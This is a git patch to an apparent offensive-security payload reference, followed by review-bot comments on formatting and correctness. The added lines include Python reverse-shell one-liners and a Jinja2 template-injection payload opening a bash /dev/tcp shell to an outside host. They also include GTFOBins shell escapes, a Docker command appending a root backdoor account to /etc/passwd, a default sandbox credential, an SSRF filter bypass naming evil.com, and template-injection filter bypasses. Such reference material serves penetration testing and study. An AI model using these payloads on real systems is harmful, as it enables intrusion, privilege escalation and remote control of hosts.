From 2e3aef1a19f0361f609c1e655d1f47f0fa6356b8 Mon Sep 17 00:00:00 2001 From: Swissky Date: Mon, 7 Jan 2019 18:15:45 +0100 Subject: [PATCH] Shell IPv6 + Sandbox credential --- .gitignore | 1 + .../Active Directory Attack.md | 1 + .../Linux - Privilege Escalation.md | 23 ++++ .../Reverse Shell Cheatsheet.md | 6 + .../Windows - Privilege Escalation.md | 1 + .../Windows - Using credentials.md | 11 ++ SSRF injection/README.md | 6 + Server Side Template injections/README.md | 121 +++++++++++++----- XSS injection/XSS in Angular.md | 2 + 9 files changed, 140 insertions(+), 32 deletions(-) diff --git a/.gitignore b/.gitignore index aa95f38..18dcf8e 100644 --- a/.gitignore +++ b/.gitignore @@ -1,3 +1,4 @@ BuildPDF/ .vscode .todo +AWS Amazon Lambda/ \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index f0a3c40..289fd20 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -39,6 +39,7 @@ Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j ./bloodhound SharpHound.exe (from resources/Ingestor) + SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100 or Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public ``` diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index f56c0e3..7a0fad4 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md 
@@ -8,6 +8,7 @@ ``` - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) - [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123) +- [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) ## Checklists @@ -82,6 +83,28 @@ * Checks to see if the host has Docker installed * Checks to determine if we're in an LXC container +## GTFOBins + +[GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. + +The project collects legitimate functions of Unix binaries that can be abused to get the f**k break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks. + +> gdb -nx -ex '!sh' -ex quit +> sudo mysql -e '\! /bin/sh' +> strace -o /dev/null /bin/sh + +## Groups + +### Docker + +Mount the filesystem in a bash container, allowing you to edit the `/etc/passwd` as root, then add a backdoor account `toor:password`. + +```bash +$> docker run -it --rm -v $PWD:/mnt bash +$> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd +``` + + ## References - []() \ No newline at end of file diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index aca8882..ec33326 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md 
@@ -36,10 +36,16 @@ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen( Linux only +IPv4 ```python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' ``` +IPv6 +```python +python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' +``` + ```python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 3a090a8..6ae7f2f 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -6,6 +6,7 @@ - [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock) - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) - [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) +- [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check) ## Windows Version and Configuration diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 5f848a4..e548695 100644 --- a/Methodology and Resources/Windows - Using credentials.md 
+++ b/Methodology and Resources/Windows - Using credentials.md @@ -23,6 +23,17 @@ Username: RetailAdmin Password: trs10 ``` +## TIP - Sandbox Credential - WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608) + +Starting with Windows 10 version 1709 (Fall Creators Update), it is part of Windows Defender Application Guard + +```powershell +\\windowssandbox +Username: wdagutilityaccount +Password: pw123 +``` + + ## Metasploit - SMB ```c diff --git a/SSRF injection/README.md b/SSRF injection/README.md index dbb18ca..202749a 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -159,6 +159,12 @@ List: ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ ``` +Bypass filter_var() php function + +```powershell +0://evil.com:80;http://google.com:80/ +``` + Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf)) ```powershell diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md index 2a91737..7cd6d5b 100644 --- a/Server Side Template injections/README.md +++ b/Server Side Template injections/README.md 
@@ -1,6 +1,42 @@ # Templates Injections -> Template injection allows an attacker to include template code into an existant (or not) template. +> Template injection allows an attacker to include template code into an existant (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages + +## Summary + +* [Tools](#tools) +* [Methodology](#methodology) +* [Ruby](#ruby) + * [Basic injection](#basic-injection) + * [Retrieve /etc/passwd](#retrieve--etc-passwd) + * [List files and directories](#list-files-and-directories) +* [Java](#java) + * [Basic injection](#basic-injection) + * [Retrieve the system’s environment variables](retrieve-the-system-s-environment-variables) + * [Retrieve /etc/passwd](#retrieve--etc-passwd) +* [Twig](#twig) + * [Basic injection](#basic-injection) + * [Template format](#template-format) + * [Code execution](#code-execution) +* [Smarty](#smarty) +* [Freemarker](#freemarker) +* [Jade / Codepen](#jade---codepen) +* [Velocity](#velocity) +* [Mako](#mako) +* [Jinja2](#jinja2) + * [Basic injection](#basic-injection) + * [Template format](#template-format) + * [Dump all used classes](#dump-all-used-classes) + * [Dump all config variables](#dump-all-config-variables) + * [Read remote file](#read-remote-file) + * [Write into remote file](#write-into-remote-file) + * [Remote Code Execution](#remote-code-execution) + * [Filter bypass](filter-bypass) +* [Jinjava](#jinjava) + * [Basic injection](#basic-injection) + * [Command execution](#command-execution) + +## Tools Recommended tool: [Tplmap](https://github.com/epinna/tplmap) e.g: @@ -37,7 +73,7 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment ## Java -### Java - Basic injection +### Basic injection ```java ${7*7} 
@@ -47,13 +83,13 @@ ${class.getResource("").getPath()} ${class.getResource("../../../../../index.htm").getContent()} ``` -### Java - Retrieve the system’s environment variables +### Retrieve the system’s environment variables ```java ${T(java.lang.System).getenv()} ``` -### Java - Retrieve /etc/passwd +### Retrieve /etc/passwd ```java ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} @@ -63,14 +99,14 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex ## Twig -### Twig - Basic injection +### Basic injection ```python {{7*7}} {{7*'7'}} would result in 49 ``` -### Twig - Template format +### Template format ```python $output = $twig > render ( @@ -84,7 +120,7 @@ $output = $twig > render ( ); ``` -### Twig - Code execution +### Code execution ```python {{self}} @@ -145,7 +181,7 @@ ${x} [Official website](http://jinja.pocoo.org/) > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed. -### Jinja2 - Basic injection +### Basic injection ```python {{4*4}}[[5*5]] @@ -155,7 +191,7 @@ ${x} Jinja2 is used by Python Web Frameworks such as Django or Flask. The above injections have been tested on Flask application. -### Jinja2 - Template format +### Template format ```python {% extends "layout.html" %} @@ -169,7 +205,7 @@ The above injections have been tested on Flask application. ``` -### Jinja2 - Dump all used classes +### Dump all used classes ```python {{ [].class.base.subclasses() }} @@ -177,7 +213,7 @@ The above injections have been tested on Flask application. {{ ''.__class__.__mro__[2].__subclasses__() }} ``` -### Jinja2 - Dump all config variables +### Dump all config variables ```python {% for key, value in config.iteritems() %} 
@@ -186,20 +222,20 @@ The above injections have been tested on Flask application. {% endfor %} ``` -### Jinja2 - Read remote file +### Read remote file ```python # ''.__class__.__mro__[2].__subclasses__()[40] = File class {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} ``` -### Jinja2 - Write into remote file +### Write into remote file ```python {{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }} ``` -### Jinja2 - Remote Code Execution via reverse shell +### Remote Code Execution Listen for connexion @@ -215,10 +251,42 @@ Inject this template {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host ``` +### Filter bypass + +```python +request.__class__ +request["__class__"] +``` + +Bypassing `_` + +```python +http://localhost:5000/?exploit={{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&class=class&usc=_ + +{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}} +{{request|attr(["_"*2,"class","_"*2]|join)}} +{{request|attr(["__","class","__"]|join)}} +{{request|attr("__class__")}} +{{request.__class__}} +``` + +Bypassing `[` and `]` + +```python +http://localhost:5000/?exploit={{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_ +or +http://localhost:5000/?exploit={{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_ +``` + +Bypassing `|join` + +```python +http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_ +``` + ## Jinjava - -### Jinjava - Basic injection +### Basic injection ```python {{'a'.toUpperCase()}} would result in 'A' 
@@ -227,7 +295,7 @@ Inject this template Jinjava is an open source project developped by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/) -### Jinjava - Command execution +### Command execution Fixed by https://github.com/HubSpot/jinjava/pull/230 @@ -242,20 +310,6 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} ``` -## Client Side Template Injection - -### AngularJS - -```javascript -$eval('1+1') -{{1+1}} -``` - -### Vue JS - -```javascript -{{constructor.constructor('alert(1)')()}} -``` ## References 
@@ -267,4 +321,7 @@ $eval('1+1') * [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/) * [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti) * [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad) -* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw) \ No newline at end of file +* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw) +* [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/) +* [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9) +* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf) \ No newline at end of file diff --git a/XSS injection/XSS in Angular.md b/XSS injection/XSS in Angular.md index 14a924c..fe77894 100644 --- a/XSS injection/XSS in Angular.md +++ b/XSS injection/XSS in Angular.md @@ -1,5 +1,7 @@ # XSS in Angular +The following payloads are based on Client Side Template Injection. + ## Stored/Reflected XSS - Simple alert > Angular as of version 1.6 have removed the sandbox altogether
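Review bot: The added `AWS Amazon Lambda/` entry in the `.gitignore` hunk leaves the file without a trailing newline (`\ No newline at end of file`); add the newline so the next entry appended to this file does not merge with it.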
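Review bot: The new SharpHound line in the `Active Directory Attack.md` hunk hardcodes a lab domain and address (`-d active.htb --domaincontroller 10.10.10.100`); replace them with placeholders such as `<DOMAIN>` and `<DC-IP>` so the line reads as a template rather than as an example tied to one lab host.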
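Review bot: In the Docker block of the `Linux - Privilege Escalation.md` hunk (`@@ -82,6 +83,28 @@`), `docker run -it --rm -v $PWD:/mnt bash` mounts the current directory, yet the next line writes to `/mnt/etc/passwd`; the command only reaches the host's `/etc/passwd` when run from `/`, so either mount `/:/mnt` explicitly or state that the command must be run from `/`. Since the block sits under `## Groups`, it should also state the precondition it relies on, membership of the `docker` group, which is exactly why that group membership is worth auditing. Style: the three GTFOBins commands are given as `>` blockquote lines while the Docker commands use a ```bash fence; use the fence for both.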
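Review bot: In the IPv6 one-liner of the `Reverse Shell Cheatsheet.md` hunk, the 4-tuple `("dead:beef:2::125c",4343,0,2)` passes `2` as the scope_id; a scope id is only meaningful for link-local (`fe80::/10`) addresses and should be `0` (or omitted via the 2-tuple form) for a global address like the one shown. The same one-liner imports `subprocess` but never uses it. Layout: the `IPv4` label is placed only before the first block, so the third block (`10.0.0.1`) now follows the `IPv6` label and reads as if it were IPv6; move the IPv6 block after both IPv4 blocks or label the third block too.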
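Review bot: In the `Windows - Using credentials.md` hunk, "it is part of Windows Defender Application Guard" leaves "it" unresolved and the sentence has no full stop; say "the `WDAGUtilityAccount` account is part of Windows Defender Application Guard." The fenced block is tagged `powershell` but contains a share path and a credential pair rather than PowerShell, so it should be a plain fence. A short line on what the account is for (the Application Guard container) would also tell a defender why it shows up on a host and what its presence does and does not mean.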
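Review bot: The "Bypass filter_var() php function" addition in the `SSRF injection/README.md` hunk does not say which validation the payload defeats (the URL check is normally `filter_var($url, FILTER_VALIDATE_URL)`) nor what the receiving code does with the host part afterwards, so the reader cannot tell why the `0://` scheme and the `;` matter. The neighbouring entry credits Orange Tsai with a link; this one should carry a source as well. Grammar: "Bypass the PHP `filter_var()` function".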
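Review bot: In the Summary of the `Server Side Template injections/README.md` hunk (`@@ -1,6 +1,42 @@`), two links are missing the leading `#` (`(retrieve-the-system-s-environment-variables)` and `(filter-bypass)`) and will not resolve. More broadly, because this same patch strips the `Java - `, `Twig - ` and `Jinja2 - ` prefixes from the headings, `#basic-injection`, `#template-format`, `#code-execution` and `#retrieve--etc-passwd` each appear several times and every copy resolves to the first heading of that name (the Ruby one); GitHub disambiguates duplicate headings with `-1`, `-2` suffixes, so either use those suffixes in the Summary or keep the prefixed headings. The sentence appended to the blockquote needs a full stop and "existant" should be "existing".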
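Review bot: Drive-by on the context lines of the Java hunk (`@@ -47,13 +83,13 @@`): `exec('cat etc/passwd')` has a relative path and should be `'/etc/passwd'`, matching the heading "Retrieve /etc/passwd".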
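Review bot: Drive-by on the context lines of the Twig hunk (`@@ -63,14 +99,14 @@`): `$twig > render (` is not valid PHP and should be `$twig->render(`; the Twig blocks are also fenced as `python` although they contain Twig and PHP, which affects highlighting only.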
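Review bot: In the Jinja2 hunk (`@@ -215,10 +251,42 @@`), the new "Filter bypass" section opens with `request.__class__` / `request["__class__"]` and no sentence saying what is being bypassed; state that the subscript form is the equivalent used when `.` is filtered, and likewise say for the URL examples that `exploit` is the injected parameter and `localhost:5000` is the Flask development server default, otherwise the `usc`, `class`, `l`, `a` and `f` parameters read as magic. The source for these bypasses (the 0day.work entry added to References in this patch) should be cited next to the section. The heading rename from "Remote Code Execution via reverse shell" to "Remote Code Execution" drops information while the section body still only shows the reverse shell; and "Listen for connexion" in the context lines should be "connection".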
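Review bot: The removal hunk (`@@ -242,20 +310,6 @@`) deletes the "Client Side Template Injection" section, but the Vue JS payload `{{constructor.constructor('alert(1)')()}}` and the AngularJS `$eval('1+1')` line are not re-added anywhere in this patch (the `XSS in Angular.md` hunk only adds one sentence); either move them into the XSS injection directory in the same commit or keep the section, otherwise the content is lost.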
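Review bot: In the References hunk (`@@ -267,4 +321,7 @@`), the third new entry is in all caps ("EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018"); normalise it to the title case and "Title - Author - Date" pattern of the neighbouring entries. The file still ends without a trailing newline.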
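Review bot: The sentence added in the `XSS in Angular.md` hunk, "The following payloads are based on Client Side Template Injection.", relies on a term whose only definition in the repository is the section this same patch removes from the SSTI README; add a one-line definition or a link to where the term is explained. Context line "Angular as of version 1.6 have removed" should read "has removed".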